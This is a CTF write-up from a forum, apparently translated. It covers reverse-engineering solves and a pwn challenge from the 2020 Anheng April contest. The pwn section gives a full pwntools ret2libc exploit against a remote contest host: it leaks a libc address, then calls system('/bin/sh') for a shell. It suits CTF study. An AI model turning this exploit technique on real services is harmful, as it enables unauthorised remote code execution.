喵了个咪乎
0x02 - Notes on the 2020 Anheng (安恒) April monthly CTF

Bi0x last edited by Bi0x

• Go read it on the blog directly

• Re: the easy ones are really easy, the hard ones are really hard

• Fell asleep halfway through

Re - Intro reverse (入门reverse)

• A freebie; the flag is right in your face
str1 = "akhb~chdaZrdaZudqduvdZvvv|"
flag = ''
for i in str1:
    # undo the encoding one character at a time: subtract 1, then XOR with 6
    flag += chr((ord(i) - 1) ^ 6)
print(flag)
      
      • flag{daef_wef_reverse_sss}

      Re - encrypt3

• Was lazy and didn't analyse it properly; just brute-forced the flag directly
enc1 = [38, 44, 33, 39, 59,
        35, 34, 115, 117, 114,
        113, 33, 36, 117, 118,
        119, 35, 120, 38, 114,
        117, 113, 38, 34, 113,
        114, 117, 114, 36, 112,
        115, 118, 121, 112, 35,
        37, 121, 61]

# single-byte XOR: try every candidate key and keep the one that yields the flag prefix
for i in range(128):
    flag = ''
    for j in enc1:
        flag += chr(j ^ i)
    if 'flag{' in flag:
        print(flag)
      
      • flag{cb3521ad567c8f251fb1252d03690ce9}

      Re - sm

• Knew it was SM encryption and guessed SM4, but spent ages looking for a tool and couldn't find one

  • then I <del>fell asleep</del> went off to do other things
• After the contest I saw a fellow player's writeup that had a library for the decryption

• From the program, guessed the key to be 0x0123456789ABCDEFFEDCBA9876543210

  • the ciphertext is 0xC079776677E5AC9931C567EB470645A7
• After installing the library, tried decrypting and got the flag

import pysm4

key = 0x0123456789ABCDEFFEDCBA9876543210
cipher = 0xC079776677E5AC9931C567EB470645A7
# pysm4 works on 128-bit integers: one block in, one block out
dec = pysm4.decrypt(cipher, key)
# print the 16-byte plaintext as 32 hex digits (Python 3 hex() has no trailing 'L' to strip)
print(format(dec, '032x'))
      
      • flag{d0389046c236e4c66bd787959f5c6e66}

      Pwn - echo server

• Simple stack overflow; the one thing to watch is that the stack pointer has to be pivoted into the bss segment
from pwn import *
from LibcSearcher import LibcSearcher
#io = process('./test')
io = remote('183.129.189.60', 10061)
elf = ELF('./test')

buf_len = 0x80
fakeebp = p64(elf.bss() + 0x500)    # saved rbp is replaced so the stack pivots into writable .bss

start_addr = 0x00000000004005C0     # address returned to after each round so the program runs again
pop_rdi_addr = 0x0000000000400823   # pop rdi ; ret
retn_addr = 0x0000000000400824      # ret gadget, keeps the stack 16-byte aligned before system()

# round 1: set rdi to printf's GOT entry and let the binary print it, leaking a libc address
payload = b'\0' * buf_len + fakeebp + p64(pop_rdi_addr) + \
    p64(elf.got['printf']) + p64(0x4006EE) + p64(start_addr)
io.sendline(b'2333')
io.sendline(payload)
io.recvuntil(b'hello ')

printf_libc_addr = u64(io.recv().ljust(8, b'\x00'))
# resolve the libc build from the leaked printf address, then compute system and "/bin/sh"
libc = LibcSearcher('printf', printf_libc_addr)
libc_base = printf_libc_addr - libc.dump('printf')
system_libc_addr = libc_base + libc.dump('system')
bin_sh_libc_addr = libc_base + libc.dump('str_bin_sh')
# round 2: same overflow, this time calling system("/bin/sh")
payload = b'\0' * buf_len + fakeebp + p64(retn_addr) + p64(pop_rdi_addr) + p64(
    bin_sh_libc_addr) + p64(system_libc_addr) + p64(start_addr)

io.sendline(b'2333')
io.sendline(payload)
io.interactive()
      
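The encrypt3 brute force above loops over all 128 candidate keys. As an added example (not part of the original post), the same single-byte XOR key can be derived directly from the known `flag{` prefix and checked for consistency, which also rejects a crib that does not fit; it uses the enc1 ciphertext from the post:

```python
from typing import Optional, Tuple

# Ciphertext of the encrypt3 challenge, copied from the post above (the enc1 list).
ENC1 = bytes([38, 44, 33, 39, 59, 35, 34, 115, 117, 114,
              113, 33, 36, 117, 118, 119, 35, 120, 38, 114,
              117, 113, 38, 34, 113, 114, 117, 114, 36, 112,
              115, 118, 121, 112, 35, 37, 121, 61])

CRIB = b"flag{"  # known plaintext prefix that every flag starts with


def key_from_crib(cipher: bytes, crib: bytes, offset: int = 0) -> Optional[int]:
    """Return the single key byte implied by `crib` sitting at `offset`.

    For a single-byte XOR, key = c ^ p holds at every position, so all crib
    bytes must agree on one value; if they disagree, the crib does not fit there.
    """
    window = cipher[offset:offset + len(crib)]
    if len(window) < len(crib):
        return None
    keys = {c ^ p for c, p in zip(window, crib)}
    return keys.pop() if len(keys) == 1 else None


def xor_decrypt(cipher: bytes, key: int) -> bytes:
    """Apply the same key byte to every ciphertext byte (XOR is its own inverse)."""
    return bytes(c ^ key for c in cipher)


def solve(cipher: bytes, crib: bytes = CRIB) -> Optional[Tuple[int, bytes]]:
    """Slide the crib across the ciphertext and return (key, plaintext) for the
    first offset where all crib bytes imply the same key. No 128-key loop needed."""
    for offset in range(len(cipher) - len(crib) + 1):
        key = key_from_crib(cipher, crib, offset)
        if key is not None:
            return key, xor_decrypt(cipher, key)
    return None


if __name__ == "__main__":
    result = solve(ENC1)
    if result is not None:
        key, plaintext = result
        print(f"key = 0x{key:02x}, plaintext = {plaintext.decode()}")
```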